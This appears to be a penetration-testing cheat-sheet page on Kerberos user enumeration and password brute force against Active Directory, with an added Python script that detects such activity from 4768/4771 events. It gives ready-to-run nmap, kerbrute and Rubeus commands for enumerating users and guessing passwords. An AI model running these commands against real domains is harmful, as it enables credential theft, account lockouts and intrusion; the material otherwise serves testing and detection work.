# User Enum and Brute Force

## **User Enumeration and Brute Force**

### Overview

First, because Kerberos is an authentication protocol, it is possible to perform brute-force attacks against it. Moreover, brute-forcing Kerberos has several advantages over brute-forcing other authentication methods:

* No domain account is needed to conduct the attack, just connectivity to the KDC.
* Kerberos pre-authentication errors are not logged in Active Directory as a normal logon failure event (4625), but as a Kerberos pre-authentication failure event (4771).
* Kerberos indicates whether the username is correct even when the password is wrong. This is a huge advantage when performing this technique without knowing any usernames.
* Kerberos brute-forcing can also reveal user accounts that do not require pre-authentication, which can be useful for an ASREPRoast attack.

However, a brute-force attack can also **lock out user accounts**, so this technique should be used carefully.
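From the monitoring side, the points above map onto domain controller logs. The following is an added example, not part of the original page: it flags source addresses whose Kerberos failures look like enumeration, password guessing, or guessing that caused a lockout. The record layout, the sample events, and both thresholds are constructed assumptions; the 4768/0x6 "unknown principal" mapping comes from standard Windows auditing rather than from this page.

```python
from collections import defaultdict

UNKNOWN_PRINCIPAL = "0x6"   # KDC_ERR_C_PRINCIPAL_UNKNOWN: no such user (4768)
PREAUTH_FAILED = "0x18"     # KDC_ERR_PREAUTH_FAILED: wrong password (4771)
CLIENT_REVOKED = "0x12"     # KDC_ERR_CLIENT_REVOKED: account locked or disabled

def ev(event_id, user, status, ip):
    """Build one simplified record with the field names used in the event XML."""
    return {"EventID": event_id, "TargetUserName": user,
            "Status": status, "IpAddress": "::ffff:" + ip}

# Constructed sample data, not taken from a real domain controller.
SAMPLE_EVENTS = (
    [ev(4768, f"guess{i:02d}", "0x6", "10.0.0.50") for i in range(12)]
    + [ev(4771, u, "0x18", "10.0.0.51")
       for u in ("alice", "bob", "carol", "dave", "erin", "frank")]
    + [ev(4771, "bob", "0x12", "10.0.0.51")]     # bob is now locked out
    + [ev(4771, "alice", "0x18", "10.0.0.7")]    # a single mistyped password
)

def detect(events, enum_threshold=10, guess_threshold=5):
    """Return {source_ip: [findings]} for one time window of events.
    Both thresholds are assumptions to tune per environment."""
    unknown, badpw, revoked = (defaultdict(set) for _ in range(3))
    for e in events:
        ip = e["IpAddress"]
        if ip.startswith("::ffff:"):             # DCs log IPv4-mapped addresses
            ip = ip[len("::ffff:"):]
        user, status = e["TargetUserName"].lower(), e["Status"].lower()
        if e["EventID"] == 4768 and status == UNKNOWN_PRINCIPAL:
            unknown[ip].add(user)
        elif e["EventID"] == 4771 and status == PREAUTH_FAILED:
            badpw[ip].add(user)
        elif e["EventID"] in (4768, 4771) and status == CLIENT_REVOKED:
            revoked[ip].add(user)
    findings = {}
    for ip in sorted(set(unknown) | set(badpw)):
        hits = []
        if len(unknown[ip]) >= enum_threshold:
            hits.append("user-enumeration")
        if len(badpw[ip]) >= guess_threshold:
            hits.append("password-guessing")
            if badpw[ip] & revoked[ip]:          # guessing locked an account
                hits.append("account-lockout")
        if hits:
            findings[ip] = hits
    return findings

if __name__ == "__main__":
    for ip, hits in detect(SAMPLE_EVENTS).items():
        print(ip, ", ".join(hits))
```

Counting distinct usernames per source, rather than raw failures, keeps one user retyping a password from triggering the rule.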

### **User Enumeration Execution**

With nmap:

```
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='[domain]',userdb=[user list] [DC IP]
```

With [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute):

```
python kerbrute.py userenum -d test.local usernames.txt
```

### **Brute-force Execution**

With [kerbrute.py](https://github.com/TarlogicSecurity/kerbrute):

```
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
```

With [Rubeus](https://github.com/Zer1t0/Rubeus) version with brute module:

```
# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>
```

### Resources

<https://www.attackdebris.com/?p=311>

<https://www.tarlogic.com/blog/how-to-attack-kerberos/#Kerberos_brute-force>

<https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a#bruteforcing>

